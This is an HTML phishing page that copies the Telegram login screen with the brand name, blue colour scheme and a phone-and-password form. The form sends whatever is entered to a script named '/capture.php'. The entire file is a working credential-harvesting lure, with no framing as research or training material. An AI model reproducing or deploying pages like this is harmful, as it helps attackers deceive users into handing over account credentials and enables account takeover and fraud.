<!DOCTYPE html>
<html>
<head>
    <style>
        body { background: #0088cc; color: white; font-family: 'Roboto', sans-serif; }
        .container { max-width: 280px; background: white; color: #333; border-radius: 10px; padding: 20px; }
        .logo { text-align: center; font-size: 24px; color: #0088cc; }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">Telegram</div>
        <form action="/capture.php" method="POST">
            <input type="tel" name="phone" placeholder="Phone number" required><br>
            <input type="password" name="password" placeholder="Password" required><br>
            <button type="submit">NEXT</button>
        </form>
    </div>
</body>
</html>